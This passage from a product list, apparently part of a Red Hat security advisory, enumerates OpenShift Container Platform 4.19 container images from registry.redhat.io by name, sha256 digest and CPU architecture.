"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
